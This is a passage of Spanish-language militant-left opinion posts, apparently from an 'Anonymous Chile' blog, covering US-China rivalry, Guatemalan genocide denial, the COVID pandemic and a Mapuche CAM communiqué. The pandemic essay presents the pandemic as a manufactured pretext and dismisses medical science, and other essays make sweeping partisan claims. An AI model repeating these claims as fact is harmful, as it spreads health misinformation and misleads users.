De la misma manera puede explicarse el fiasco del famoso conflicto “árabe-israelí”, que si existió, fue en los primeros años de la ocupación sionista de Palestina, muriendo oficialmente cuando Estados Unidos reunió en Camp David a los supuestos enemigos para ponerlos a trabajar unidos bajo subordinación a Washington. Tal alianza, orientada en primera instancia contra el pueblo palestino, cobró especial vigencia después de la revolución islámica en 1979 cuando todas las armas israelíes o árabes se reorientaron en dirección a Teherán. El “interés nacional” israelí los ha llevado a aliarse con las monarquías árabes bajo tutela imperial, llegando hasta a dar apoyo logístico, financiero y militar a los “odiados árabes” de la organización terrorista Estado Islámico

Sin embargo, durante la guerra fría esta lógica tuvo una excepción relevante cuando China y Estados Unidos establecieron una asociación que apuntó en contra de la Unión Soviética, a la que ambos consideraban su principal enemigo. Esto produjo el deshielo tras 23 años de no tener ningún tipo de contacto y 29 durante los cuales no hubo relaciones diplomáticas entre Beijing y Washington. En este caso, más allá que la URSS y China postulaban un futuro socialista, primó el interés nacional de cada uno

En el proceso de las luchas independentistas de los pueblos africanos, libradas en la segunda mitad del siglo pasado, a menudo chinos y soviéticos se encontraban enfrentados apoyando fuerzas antagónicas. En la platea, Estados Unidos se solazaba viendo como se profundizaban diferencias que coadyuvaban a debilitar a su enemigo principal. Inclusive, en los años 80 del siglo pasado, China atacó a Vietnam so pretexto de que era un “satélite soviético” al que se le debía dar una lección. Esto, después que Vietnam invadió Camboya para desalojar del poder al tenebroso Jemer rojo que había cometido uno de los peores genocidios del siglo XX contra su pueblo. El Jemer Rojo era aliado de China. Era la segunda vez que el Ejército Popular de Liberación de China salía de su territorio para librar una batalla en el extranjero. La primera, paradójicamente en 1950 para enfrentar a Estados unidos en Corea impidiendo de esa manera que la guerra se extendiera al territorio chino como era la idea del general estadounidense Douglas MacArthur, jefe de las tropas norteamericanas invasoras en Corea.

El fin de la Unión Soviética y el exitoso desarrollo económico, social, científico, tecnológico de China que comenzó a proyectarla a comienzos del siglo XXI como una gran potencia planetaria, hizo ver a Estados Unidos que la luna de miel iniciada por Henri Kissinger y Richard Nixon en 1972 debía concluir. Después de todo, la Unión Soviética ya no existía y China “se estaba aprovechando de sus relaciones para transformarse en un rival peligroso que amenazaba su hegemonía”.

De la mano de Condoleezza Rice, el presidente George Bush comenzó el viraje de la política de amistad y coexistencia pacífica con China. Bajo el influjo de la Doctrina de Dominación Permanente (DDP) enunciada en 1992 cuando la Unión Soviética ya había desaparecido y Estados Unidos emprendía el proceso para dominar el mundo a su antojo.

Así mismo esta doctrina se proponía prevenir el resurgimiento de un nuevo enemigo estratégico de Estados Unidos que apuntara hacia la obtención de poder global o que le significara una competencia desmedida. En alianza con Donald Rumsfeld, el secretario de Defensa, Rice ideó el fin de los días en que Estados Unidos y China cooperaron en la lucha contra el terrorismo tras los atentados del 11 de septiembre de 2001. En ese contexto planeó imponer la “Teoría del Caos Constructivo” para sembrar su hegemonía.

Fue el inicio de la confrontación que siguió con Obama y su doctrina de “Reaseguramiento Estratégico”, que con Trump adquirió características de una “guerra comercial” bajo la que se esconde una verdadera batalla política e ideológica entre sistemas que a todas luces tendrá continuidad con Biden, porque no habrá presidente de Estados Unidos que la pueda cambiar. A su interés nacional se seguirá subordinando cualquier decisión de política exterior, sin importar de qué partido sea el presidente, tampoco si se aplica o no en los términos de la democracia y el Estado de derecho.

La humanidad deberá irse acostumbrando a ello, porque vivimos un tiempo de declive de la hegemonía de una potencia y el ascenso de otra que, paradójicamente no aspira a ella. En cualquier caso, hay que tener siempre presente que, para un país no existen amigos ni enemigos, sólo intereses.

La amnesia de un país vencido

Publicada el 13/08/2021 - 13/08/2021 por Anonymous Chile

Ahí está el país vencido, que con todo lo que pasó en tiempos de dictadura era para que a estas alturas en lugar de neoliberalismo y desmemoria, la sociedad hubiera reconstruido su tejido social, encarcelado a los que cometieron crímenes de lesa humanidad.

Para no ir tan lejos, ahí está el país vencido, que con todo lo que pasó en tiempos de dictadura era para que a estas alturas en lugar de neoliberalismo y desmemoria, la sociedad hubiera reconstruido su tejido social, encarcelado a los que cometieron crímenes de lesa humanidad desde el gobierno y haber levantado la infraestructura.

Pero, por el contrario, está en los puros huesos. La misma sociedad carroñera se ha dedicado a negar el genocidio, a menospreciar a los familiares de las víctimas del Conflicto Armado Interno, y a dedicarse a ver desde la pereza y la apatía cómo desmantelan el Estado y desaparecen todos los recursos, los que desde entonces se apropiaron de las urnas, de las voluntades y de la misma desidia colectiva. Porque no hay nada mejor para una clica criminal que una sociedad chambona.

Los testimonios de sobrevivientes del Conflicto Armado Interno son innumerables. Dianna Ortiz, fue una sobreviviente de las torturas del gobierno de Guatemala en los tiempos de dictadura. Una monja estadounidense que fue secuestrada por paramilitares y llevada a un centro de tortura, donde la violentaron durante 24 horas. Se contaron 110 quemaduras de cigarro en su cuerpo. Lo demás que vivió ahí no se puede escribir, es imposible repetirlo, imaginarlo siquiera. Y esta mujer luchó toda su vida denunciando, relatando el horror que vivió y que vivieron los pueblos originarios. Y así como ella están las denuncias de las mujeres ixiles que testificaron en el juicio por genocidio contra Ríos Montt, pero la sociedad las dejó solas, las señaló, las juzgó, las revictimizó. Con esto demostrando la peor de las ingratitudes porque ellas vivieron estos abusos siendo niñas.

Están los cientos de imágenes que fueron captadas por periodistas donde se muestran los cuerpos torturados de miles de personas, aún así la sociedad sigue negando el genocidio. Se atreven a acusar con descaro que la propia gente se buscó ese tipo de violencia. Que quién los mandó a meterse a camisas de once varas. Entre los asesinados hay mestizos e indígenas, pero la dictadura se ensañó contra los pueblos originarios, querían desaparecerlos, la típica Guatemala que se ha creído siempre europea y caucásica, aunque el reflejo en el espejo le diga lo contrario. Por eso quemaron sus casas, acribillaron a poblados completos, los que lograron escapar se refugiaron del lado de la frontera con México y otros fueron más lejos, hacia Estados Unidos. Esas tierras robadas fueron regaladas a ladrones oligárquicos que hoy son los grandes terratenientes del país. La idea del retorno de estas comunidades cada vez está más lejana, pues muchos fallecieron en el exilio.

En la capital guatemalteca cuando se camina por las calles, es común encontraste con empapelados en las paredes, con fotografías de los desaparecidos, la gente pasa sin mosquearse, total que no eran familiares de ellos. Se ha borrado del sistema educativo toda evidencia de aquellos tiempos aciagos y es raro el docente que hable del tema con sus alumnos, es muy probable que si lo hace otro compañero lo denuncie y pierda el trabajo acusado de comunista. En la universidad el descaro de los docentes sobrepasa todo límite, no hablan del genocidio, pero cuando lo hacen es a favor de los dictadores. Salvo uno que otro que se atreve a decir lo contrario, entonces es visto como el apestado y lo empiezan a llevar en la mirilla los otros docentes. Los alumnos no preguntan tampoco porque la urgencia es el título, aunque tengan que pagar por este.

Y están, por supuesto, los que saben la historia y la aprovechan para sacar beneficio personal. Ahí se cuentan grandes feministas que usan las indumentarias indígenas cuando van a ponencias al extranjero a hablar de los derechos de las mujeres indígenas, que reciben diplomas y reconocimientos, que les pagan los pasajes de avión y la estadía, pero que dentro del país son tan racistas con estas mujeres como los propios fascistas de siempre. Editoras, editoriales, espacios de comunicación cerrados a las voces de las mujeres indígenas porque para estas feministas las mujeres indígenas no tienen voz propia ni capacidad para hablar de ellas mismas ni de las problemáticas que viven en sus comunidades; ellas, mestizas y graduadas de universidad sí tienen y; por supuesto el conocimiento y la capacidad para hablar de las otras.

Como ellas los grandes humanistas de izquierda, algunos ex guerrilleros que recaudan fondos en conferencias internacionales hablando de la memoria histórica, dinero que jamás va a los pueblos originarios ni a los familiares de los desaparecidos, dinero que se pierde en un limbo. Porque viven de eso, no trabajan, viven a costillas de la sangre de los caídos. Están los que dicen que merecen un puesto bueno en el gobierno y se ponen de alfombra con los gobiernos neoliberales, ahí se les ve lamiéndoles los zapatos a las marionetas de turno. Los grandes intelectuales que son incapaces de escribir un texto si no hay dinero de por medio, no digamos acercarse a una comunidad indígena si no hay fotos y redes sociales donde se exponga la visita del gran pensador. Lo que es peor, no acercarse porque una cosa es hablar de los indígenas (y darse a conocer por la desgracia que estos sufrieron) y otra rebajarse a ir a donde viven.

Y están, los que se cuentan por canastos, los grandes progresistas, los democráticos, que ni de izquierda ni de derecha, los que hacen las luchas en la comodidad de una red social, pero cuando salen a manifestar los pueblos originarios se esconden debajo de las camas de sus casas porque no les da la vergüenza, de lo minúsculos que son ante la dignidad de los que en cualquier circunstancia siempre ponen el pecho.

Cretinos hemos sido la gran mayoría con los familiares de los sobrevivientes, le hemos faltado a la memoria de todos los que lucharon y les arrebataron la vida por haberse atrevido a soñar con un país igualitario. Entre esas masas estamos los de la generación de la desmemoria, que nacimos en esos tiempos y que nunca nos ha dado por investigar por nosotros mismos, por informarnos de la verdadera historia del país, de su pueblo. Vamos a donde sople el viento y el viento lo manejan con grandes maquinarias de desinformación las mafias oligárquicas. Aquí todos tiramos piedras y escondemos la mano.

Toda esta mezcolanza de rastreros somos los que destruimos Guatemala, tal vez la espuma de toda esta contaminación es el gobierno que es lo que sale a flote. Y las oligarquías que saben que con un barniz arreglamos todo, al chapuz, que no vamos más allá. Lo tienen a su favor. Pero en el fondo la pudrición somos todos los que no movemos un dedo para que las cosas cambien. Claro está, otra cosa son los pueblos originarios, que son la dignidad milenaria del país que en otrora fuera, un lugar de muchos árboles.

El miedo como arma de control social

Publicada el 13/08/2021 por Anonymous Chile

«Y una vez más el problema no es el cómo nos situamos ante la realidad, sino el cómo asumiendo y aceptando su condición material objetiva, no nos dejamos engañar por el fenómeno y descubrimos lo que se esconde por debajo de su apariencia».

Muchas veces la mirada política de los hechos, se constituye en una suerte de registro y juicio racional, casi aséptico, eludiendo empatías o complicidades emocionales, que pueden distorsionar la síntesis con la que se pretende categorizar los distintos momentos y expresiones de la realidad. A esta precaución intelectual se le podría comparar con la antigua y conocida frase machista de “los hombres no lloran”. No es precisamente un mandato a que seamos objetivos, algo que suele exigirse y que suena como el llamado a que seamos serios, pero no se trata de este tipo de condición, sino de la idea de que involucrar emociones y sentimientos desdibuja la comprensión exacta del análisis al que se someten los acontecimientos. La parquedad, la postura fría y direccionada únicamente por relaciones de un carácter lógico, evitaría al pensar de muchos, la manipulación de las conciencias.

¿Qué ocurre entonces cuando un hecho tiene un carácter grave, cuando una situación determinada se nos presenta trágica, cuando un acontecimiento tiene visos de macabro o siniestro?. Al analizar esas circunstancias, ¿tomaremos acaso, la decisión de buscar y rebuscar términos que no causen alteración pública y traicionaremos el carácter de esos hechos, relativizando su verdadera naturaleza o esencia? Las corrientes intelectuales hace ya bastantes años se han configurado en función de lo que la propia realidad despliega en cuanto a efectos, ya sea para situarse -como se dice- “más allá de los hechos”, o en el espacio de la moderación “ni más allá ni más acá de los hechos”, o en una definición realista, que es como decir “cercana a la realidad” y otros impulsándose desde los hechos “construyendo realidad”, algo parecido a inventar realidades. Y una vez más el problema no es el cómo nos situamos ante la realidad, sino el cómo asumiendo y aceptando su condición material objetiva, no nos dejamos engañar por el fenómeno y descubrimos lo que se esconde por debajo de su apariencia. Dar cuenta de la realidad, es decir, observar el cómo las condiciones materiales objetivas están dadas, posibilita hacer una lectura acorde y pensarla desde su esencia y no desde un espejismo.

Pues bien, es necesario instalarnos en el movimiento histórico, en esta dinámica de idas y venidas de todos y todas, considerando las brechas, que de seguro notaremos, si caminamos con atención para no caernos. Nos daremos cuenta que existen los que “están ciertos” de lo que pasa y nosotros que no tenemos la certidumbre, por una razón muy sencilla, no tenemos la sartén por el mango. Y aquí, nos sumerge a tiempo en los hechos, el motor de la historia: la lucha de clases. Hacia los finales de la tercera década del siglo XX, un momento de crisis y convulsiones sociales, don José Ortega y Gasset, lanzó una muy fuerte crítica a quienes se encontraban cumpliendo tareas diversas en las disciplinas científicas básicas, en especial a los físicos y a los médicos. Don José Ortega se refería a la petulancia y a la agresividad de estos profesionales, al desmedido afán de manipulación que se apoderaba de éstos, al punto de poner en jaque los procedimientos éticos y de esta manera saltarse las vallas que resguardan la vida humana de ejercicios y experimentos, ni siquiera dudosos, sino desconocidos, porque nadie estuvo informado de su realización. Entonces habló del “Terrorismo de los Laboratorios” y del “imperialismo de la Física”, la crítica pretendió alcanzar un tecnocentrismo deshumanizante, que no buscaba sólo conocer su objeto de estudio, sino manipularlo, domarlo, alterando muchas veces su condición original, transgrediendo de este modo los límites que la razón impone. Todas las disciplinas científicas y también la filosofía, se encontraban en ese tiempo subordinadas a la supremacía de la física.

Y claro, había un contexto histórico que posibilitaba esta coyuntura, es cuando por vez primera, podemos dudar, de que en las investigaciones y en los experimentos científicos no todo es progreso y avance, y el que nos quieran hacer creer que la novedad tecno-científica es impecable moralmente y social y políticamente neutral, y podemos afirmar categóricamente que no es así. Y ya en esta tercera década del siglo XX, nos encontramos que capitalismo y corporaciones científicas de gran factura, constituyen una alianza estrecha de propósitos e intereses donde el lucro es el principal de los objetivos. Desde entonces, desde el sistema, la ciencia y la medicina se unen para cuidar la salud de los patrones y desentenderse de la salud de los proletarios e indigentes.

Los problemas sanitarios y de salud, no tenían ni tienen aún como causa inmediata, las demoras o las limitaciones del desarrollo científico, si bien se estima esta dificultad como un factor importante, los estudios respecto de estos grandes problemas, no han establecido la relación causal más profunda en la existencia, en distintos periodos de la humanidad, de estructuras políticas, sociales y económicas, tremendamente injustas, opresivas y segregadoras. No es coincidencia que, en las sociedades esclavistas, en el medievo y ahora en el capitalismo, las capas más golpeadas por enfermedades y epidemias graves, hayan sido y sean hoy, los sectores pobres y las extensas franjas sociales hundidas en la miseria y el abandono. Las largas y extenuantes jornadas de trabajo, sin retribución previsional alguna, y con la mínima ración de alimentos, conducían a la fatiga corporal y psíquica, y en pocos años al descalabro total de la salud, a quienes conformaban la fuerza de trabajo en estas sociedades de clases. Explotación, opresión, miseria, tugurios, hospicios, se constituían en la cadena forzada de la miseria, que laceraba la vida de los pueblos, minando sus energías y condenándolos irremediablemente a la muerte.

Los pactos de una vocación necrofílica

La revolución burguesa que, al andar de un siglo y siglo y medio, desata una de las revoluciones técnicas y científicas más importantes de la historia de la humanidad y que el “Manifiesto Comunista” en 1848, ya confirmaba como una de las tareas ineludibles del capitalismo: “La burguesía no puede existir sino a condición de revolucionar incesantemente los instrumentos de producción y, por consiguiente, las relaciones de producción, y con ello todas las relaciones sociales.”1 Siendo así, produce las alteraciones más profundas, en los ámbitos culturales, éticos y morales. Una nueva concepción se impone a la humanidad, y esta vez la poderosa y burguesa Ley del Valor, regirá la vida de las sociedades fundadas bajo el sello del capital. La divisa “Libertad, Igualdad, Fraternidad”, a pesar de las simpatías que despierta en los sectores del pueblo, pronto es olvidada en las instituciones del Estado y nunca formará parte de la propiedad privada de los medios de producción. El Estado burgués nació contrariamente para ser la génesis de la explotación, el abuso y el creador por excelencia de un abismo de desigualdad social entre las clases.

No siempre el desarrollo técnico-científico, estuvo asociado al progreso y a satisfacer significativamente las necesidades de vida de los seres humanos. Es posible que, en los primeros círculos dedicados a la investigación y a la ciencia, los pioneros hombres o mujeres dedicados a estas disciplinas, hayan estado premunidos de búsquedas e intenciones honestas y de un verdadero ánimo al servicio del conocimiento, por lo mismo, en esa etapa artesanal de las ciencias, fueron objeto de sospechas y persecución desde las estructuras de poder. El poder político y religioso los consideró una verdadera amenaza para sus creencias y privilegios, así y todo, fueron los que, desde condiciones rudimentarias y adversas, asentaron los primeros ejercicios metodológicos para situar al mundo en el umbral magnífico de la verdad científica. Gracias a su perseverancia, el mundo advino al periodo del Renacimiento (Siglos XV y XVI) y de los siniestros tribunales de la “Santa Inquisición” se dio paso al renacer de los valores e ideales clásicos, abriéndole de par en par las puertas de la historia al pensamiento moderno. La tierra deja al sol ponerse en el centro del universo y la razón se abre paso con desenfado por los pasillos del mundo laico. Los seres humanos cometieron la audacia de desatar apretados nudos culturales e ideológicos, y con ello abrir las compuertas a un torrente de sabiduría y conocimientos que el mito y la superstición habían contenido con siglos de ceguera y oscurantismo. Quedarán definitivamente atrás las meras conquistas de territorios para inaugurar las guerras por las conquistas de Mercado. La modernidad se acompaña de una nueva clase social: la burguesía y con ella la transformación imparable de las fuerzas productivas y entre éstas, el nutrido impacto de lo que siglo y medio después se llamará la “Ilustración” (Siglo XVIII y XIX) que emerge para dar consistencia al intelecto en los ámbitos científicos, económicos, políticos y sociales. Esa potente inquietud de los primeros hombres y mujeres de ciencia, por dar luz al mundo y a la historia, hace emerger la disyuntiva humana entre lo verdadero y lo falso y en esa apuesta el protagonismo y el antagonismo se universalizan abarcando el todo que compromete la lucha de clases, como verdadero dinamismo del movimiento social.

La clase que hasta ayer jugaba en las trincheras de la revolución, en los finales del siglo XIX se comienza a tornar una clase conservadora, para finalmente entrar en postulados reaccionarios, para evitar el derrumbe de ese poder que buscaba ya el dominio planetario. Y es en este momento del desarrollo capitalista, que surgen los entresijos de ese poder que invade, conquista, saquea, y asesina por el dinero y las riquezas. En 60 millones de muertes se tradujo en América Latina la conquista Ibérica de España y Portugal en el lapso de 150 años, una verdadera hecatombe demográfica, como la llamó el historiador Celso Furtado. Hay que nombrar los resultados trágicos de los levantamientos campesinos y de obreros en la misma Europa. En 1871 en la semana del 21 al 28 de mayo la represión asesinó a 100.000 personas en la Comuna de Paris. La 1° y 2° Guerra y sus saldos horrorosos de muertes, en la 2° conflagración fueron otros 60 millones de muertos entre civiles y militares, destacando el bombardeo de Hiroshima y Nagasaki. Entonces, ¿Qué nombre poner a estas sumas macabras de tragedias humanas, que asaltan la vida y la moral proletaria con esa vocación necrófila de las clases dominantes?

¿De dónde nos podemos asir, para construir un relato libre de toda indignación ética? ¿Cómo hacer descansar la rabia fuera de nuestras cabezas, para entender y mascar los hechos, sólo como el resultado lógico de las contradicciones de clase? Incluso el pensar la edificación de un mundo nuevo, imaginando solo una tiesa escenografía que nos muestre en fantasía el mundo vivo y justo que anhelamos. Nos negamos a falsear los hechos, nos negamos a su manipulación, pero no nos negamos a que nuestra subjetividad, comprometida con los dolores y también las esperanzas de nuestra clase, diga que el cuerpo y la carne de todos los seres vivos duele cuando se le atormenta, que los sentidos que dan conciencia a nuestra existencia captan el desprecio y las ofensas dirigidas a nuestras realidades de pobreza y miseria, que el miedo golpea y golpea duro, cuando se levantan amenazas y condenas que pueden paralizar la vida de los nuestros y la propia. Tenemos la convicción probada y desde hace mucho que, la “Pandemia” que hoy amenaza y le pone cerco a nuestras vidas, no es otra cosa, que la franca manifestación del fracaso de los sistemas de salud en todo el mundo capitalista, y también tenemos la certeza que para las transnacionales ha sido el mejor de los pretextos para atemorizar a la población común. Esta “Pandemia”, dirigida desde los espacios del poder y del oprobio con todo lo que arrastra de toxicidad, ha envenenado las manifestaciones y relaciones sociales, dando lugar a políticas autoritarias, que el gran capital imperialista necesitaba instalar para cancelar y bloquear todos los procesos de movilización y de resistencia social y política que se habían generalizado en el 2019, cuestionando los nefastos efectos del llamado neoliberalismo.

Nos hemos enfrentado a una cantidad tan abrumadora de informaciones, desinformaciones, contradicciones evidentes y vergonzosas, que podemos perfectamente convencernos que respecto a esta “Pandemia” la “Ciencia Médica” poco o nada sabe de lo que habla. Lo que nosotros sí sabemos, es que asistimos al ensayo de un modo de control social, que se constituye en la antesala de un régimen autoritario que nos mantendría a raya, en el entendido que, desde la declaración de la “Pandemia”, ya lograron crear un grueso de población sometida y dominada. Hoy la industria de guerra debe competir o compartir la ganancia con la poderosa industria farmacéutica transnacional que se ha constituido en el monopolio extremo de la medicina, que cuenta con un extraordinario apoyo del poder político y es el que se esconde detrás de los servicios insuficientes y deficientes frente a las miles de demandas por mejor salud para todos y todas.

Sin duda, estamos en un proceso que va cuesta arriba, lo poco que se avanzó en definiciones, se diluyó con los retrocesos que impuso la coyuntura sanitaria, sumándose ésta como otra de las aristas, quizás la más compleja, de la crisis del capitalismo. Sin embargo, debemos preguntarnos y ahondar, acerca del eje que mueve la actual coyuntura, para saber con tino y exactitud qué piezas debemos mover en este suigeneris enfrentamiento con las clases dominante. A nuestro juicio, se ha erigido con fuerza una triada de guerra que está operando desde el sistema político: la tecnología, el militarismo y el fascismo, como el modo táctico de paralización, de desarme y dislocación social y política de los trabajadores y el pueblo en el actual estado de confinamiento sanitario. Unilateralismo y sesgo comunicacional, mínimo gasto fiscal para mitigar los costos económicos y sociales del pueblo, fuerte represión y criminalización de las protestas. La gran ausente es la claridad de la razón y la creación cultural. Es lo que hemos visto y vivido el reciente año y las tareas que se desprenden de esta expresión contrainsurgente del enemigo son: ¡Convergencia Ahora! de la Izquierda consecuente y los revolucionarios por la Vertebración en el corto plazo de todos los sectores que estén en disposición de lucha contra el modelo y contra el capitalismo como sistema. Reunir el conjunto de demandas políticas, económicas y sociales y elaborar una síntesis cuyo contenido concite e interprete a todos los sectores obreros y populares, ampliando este llamado a los sectores medios con una disposición de lucha consecuentemente democrática. Emplazar la conciencia y la práctica política y social de todos los actores, en el convencimiento de separar radicalmente aguas con nuestros enemigos y poner la confianza sólo en la movilización decidida, permanente y ofensiva del pueblo y los trabajadores. No hay ni puede haber otro camino que solo el de la lucha frente a la ofensiva de la clase patronal.

Profundizar el antagonismo de clase: Una necesidad para las conquistas populares

Las expectativas que el proceso constituyente ha generado en el pueblo, son una ilusión que se sostiene y explica por la normalización a la que nos ha adoctrinado durante décadas el propio capitalismo y el creer que nuestras necesidades de clase deben convertirse en demandas que el mismo sistema que nos empobrece debiese asistir.

Y no debemos extrañarnos que esto sea así. La agudización de las contradicciones que se expresó en la revuelta de octubre del 2019, tiene un alto componente reivindicativo que no se ha logrado traducir en una transformación sustancial en cuanto a la comprensión de nuestro pueblo respecto de su rol histórico en la lucha de clases. La radicalidad y el descontento generalizado frente a toda manifestación y representación del “modelo” aún no logra cristalizar en movilizaciones y orgánicas que expresen la politización de las demandas sociales y del antagonismo para radicalizar aún más el conflicto de clases, teniendo como finalidad cambios estructurales.

Por ello, es necesario avanzar en el desarrollo de los niveles de conciencia para generar en este proceso de acumulación, la deseada politización de la lucha en todas las expresiones del pueblo y de la clase. De lo simple a lo complejo, de lo pequeño a lo grande, debemos apuntar a superar el estadio reivindicativo de conciencia, donde las necesidades han sido asumidas como demandas bajo una lógica clientelista, que no nos han permitido avanzar en la profundización de los conflictos de intereses entre explotados y explotadores y del mismo modo, no nos ha permitido mirar más allá del cuestionamiento parcial dirigido al modelo; en vista de una democracia avanzada mediante reformas y situando a los sectores progresistas como únicos referentes visibles de un “proyecto político” o “alternativa” para el pueblo trabajador.

Hoy es preciso recuperar la idea y la conciencia de que cada necesidad que el pueblo reconoce para sí como parte de su precariedad, es producto de la explotación capitalista operando con toda la maquinaria del Estado burgués. Cada necesidad expresa un punto de conflicto donde el antagonismo de clase es el centro del mismo: nuestras necesidades no son demandas negociables, son derechos que nos pertenecen como pueblo y que nos han sido robados, mercantilizados, privados, generando un enorme despojo histórico, y es nuestro deber avanzar en sus reconquistas, como parte de un proceso ascendente

de organización y lucha, que no tenga por delante el tope de la “solución” puntual y de parche del conflicto, sino que se entrame en un proceso de politización, organización y movilización clasista de nuestra fuerza y con un claro sello popular y revolucionario, logrando y defendiendo cada conquista, como los eslabones de la construcción cotidiana y concreta del Poder Popular.

Represión, narcotráfico y oportunismo político: los enemigos de la lucha mapuche

Publicada el 13/08/2021 por Anonymous Chile

Compartimos el comunicado de la Coordinadora Arauco Malleco CAM, que analiza los acontecimientos en el Wallmapu, en la perspectiva de la lucha autonomista del pueblo Nación Mapuche.

COMUNICADO PÚBLICO CAM Y COMUNIDADES EN RESISTENCIA

A las comunidades y lov en resistencia, a los procesos de control territorial, a la comunidad pública nacional e internacional:

Vivimos tiempos marcados por la profundización de la estrategia contrainsurgente que el Estado chileno ha articulado contra la causa Mapuche siendo, una vez más, la política del “garrote y la zanahoria” su mayor manifestación. En la actualidad, cuando el avance de la lucha autonomista territorial hace temblar los intereses del gran empresariado, el Estado chileno vuelve a asumir la doctrina de la seguridad nacional definiendo claramente como el enemigo interno al Pueblo Nación Mapuche, razón por la cual ha implementado una nueva arremetida política-represiva en contra de las expresiones autonomistas más consecuentes.

Estas operaciones político-policiales se enmarcan en una fuerte campaña institucional de carácter racista que pretende vincular a la causa Mapuche con el narcotráfico y el crimen organizado. Un escenario donde se vislumbra, aparte de la estigmatización social de los medios de comunicación, la emergencia de las voces del empresariado, del latifundio y de las autoridades de gobierno, quienes sostienen que la lucha Mapuche es ilegítima, terrorista y delincuencial. Una estrategia que combina distintas formas de funcionamiento; por un lado, la política-represiva y por otra, la política-intervencionista-integracionista. No obstante, ambas tienen como eje central intentar desarmar nuestros planteamientos y arrinconar las expresiones del weichan Mapuche.

En este escenario, declaramos lo siguiente:

KIÑE: Que frente a la última arremetida represiva ejecutada por la policía chilena en contra de Comunidades Mapuche, lo que trajo nefastas consecuencias a numerosas familias de nuestro pueblo como en los efectivos policiales, responsabilizamos al Estado Chileno de este nuevo hecho represivo, toda vez que este procedimiento fue elaborado por agentes del Estado, quienes utilizando las herramientas del ámbito jurídico-policial, ejecutaron una operación de inteligencia y un intento por vincular al movimiento Mapuche al narcotráfico. Una operación que, en el fondo, tiene como objetivo proteger nuevamente los intereses de los grupos de poder que operan indiscriminadamente en nuestro territorio. Así se explica el operativo descomunal, torpe e inescrupuloso de las policías chilenas que no trepida en un actuar marcado por el odio y el racismo a la hora de enfrentar a nuestra gente, abusando como siempre de mujeres, ancianos y niños.

Vemos a la policía chilena actuar como carne de cañón en defensa de los intereses de un estado capitalista, razón que explica un actuar, el cual sobrepasa su propia institucionalidad al verse sometidas a las verdaderas directrices que emanan del poder central, es decir, de la élite política-económica que custodia a sangre y fuego los intereses del gran capital.

EPU: Estamos frente a una nueva operación de inteligencia política que pretende abrir un escenario distinto en el Wallmapu, caracterizado, en potencia, por imponer artificialmente la realidad del narcotráfico. Así, por una parte, se intenta mostrar a parte del movimiento mapuche como una expresión corrupta y desviadas de los principios mapuche de lucha, valores legados de nuestros futakeche kuifi yem, y, por otro, que busca profundizar una campaña mediática para justificar la efectividad del Estado con respecto al desmantelamiento de redes criminales. Ciertamente una operación de inteligencia que surge por la presión del empresariado comprometido en las zonas de conflicto, pretendiendo a toda costa enlodar nuestra justa lucha, sosteniendo el aparto coercitivo hacia quienes luchamos por la recuperación y defensa del territorio.

KÜLA: Sin embargo, así como condenamos las acciones represivas de parte del Estado en contra de comunidades en resistencia, también queremos dejar muy en claro que no vamos a aceptar ningún tipo de desviación de nuestro camino de lucha trazado en el weichan Mapuche, el cual nos ha otorgado una serie de principios y normas que son el mejor legado de nuestros antepasados en orden a reconstruir nuestro Pueblo. Este legado es nuestro mejor acervo para seguir desarrollando nuestra resistencia, por lo tanto, también vemos con preocupación la presencia e influencia de agentes externos a las comunidades tratando de introducir drogas y malas prácticas principalmente con nuestros weche, con el fin de transformarlos en consumidores o bandas dedicadas al tráfico

Desde ya hacemos un llamado urgente y necesario a condenar toda presencia del narcotráfico en las comunidades Mapuche, dejando en claro que con este flagelo que ya azota a los no mapuche en los sectores populares, se crean las condiciones para que esté maldito sistema destruya nuestra matriz social, política y cultural.

Hacemos un llamado a las demás organizaciones y comunidades Mapuche a hacernos la autocrítica a través de nütran y trawün para hacer un deslinde categórico frente a esta cruel y triste realidad que puede golpearnos desde adentro, sobre todo con los efectos que genera la presencia y consumo de drogas en nuestros territorios.

Esta debe ser una condena fuerte y clara en contra de toda expresión de tráfico y consumo, porque no solo contraviene con nuestro kimün ka rakiduam Mapuche, sino también por nuestro compromiso de respetarnos entre Mapuche y respetar nuestro sistema de vida. Entendiendo que este sistema y su orden jurídico, militar e institucional pretende exterminar física y políticamente a nuestro pueblo de cualquier modo, no trepida en introducir todos los males que están a su disposición. Hacer frente a este flagelo es también hacer frente al sistema de sumisión winka y a todas sus expresiones que han desestructurado a nuestra realidad.

MELI: Por otro lado, como organización mapuche autonomista vemos con indignación como nuevamente desde los epicentros de la dominación colonial winka, esta estrategia de contrainsurgencia comulga con el quehacer los operadores políticos, los pseudointelectuales mapuche y ciertos dirigentes rastreros, quienes pretenden nuevamente teñir de multiculturalismo el proceso constituyente que han instalado los chilenos. A nuestro parecer, esta es una nueva arremetida que se da en el marco de una mayor consolidación de las luchas autonomistas y del weichan revolucionario. Es una ofensiva político intervencionista, iniciada con la discusión de los escaños reservados, que tiene su mayor expresión en la dinámica de cooptación que la institucionalidad ha impulsado hacia los Pueblos Indígenas en el proceso constituyente.

Los escaños reservados representan la continuidad colonial de las cuotas de participación indígena que ofrece el estado chileno, las cuales tienen su base ideológica y política en el momento fundación de la ocupación a sangre y fuego del Wallmapu. Es el andamiaje político e ideológico que se instala con el genocidio y la usurpación de nuestro territorio.

Insumos ideológicos que durante toda la historia han sido parte de la institucionalidad opresora representada, por ejemplo, en los juzgados de indios, en los Títulos de Merced, en el sistema reduccional y en una serie de antecedentes jurídico-institucionales que son de la historia negra y representan el traspaso de la lógica colonial de dominación hasta nuestros días. Espacios de sobrevivencia y sometiendo que persisten hasta la actualidad, en donde se fija la lógica monocultural de los estados dominantes y cristalizan la integración forzada a la par de intentar disolvernos como pueblo.

Los escaños reservados y la participación en la constituyente representan más de lo mismo; surgen desde el poder winka y para el poder winka. Y vemos con rabia y dolor como nuevamente en esta coyuntura se instala este artilugio en la política queriendo convencernos de que es la vía para lograr nuestros derechos fundamentales. Una vez más, cierta dirigencia, la cual no tiene las prerrogativas ganada en la lucha territorial, sedienta de poder, intentan encausar al movimiento mapuche a la vía institucional, desconociendo una lucha que ha significado la muerte nuestros weichafe, la cárcel política, la tortura y la represión de las comunidades en lucha.

Hacemos un llamado a nuestro pueblo nación a dar continuidad a la lucha autonomista y revolucionaria fortaleciendo la resistencia al capitalismo, ejerciendo el verdadero control territorial, disputando y combatiendo contra nuestros verdaderos enemigos. Esta es la única vía para reconstruir nuestra nación en su matriz cultural sostenida por nuestros espacios territoriales y políticos, una vez liberados. Debemos romper con las estructuras de poder colonial, insubordinarnos a la cultura winka y sus basuras enajenantes.

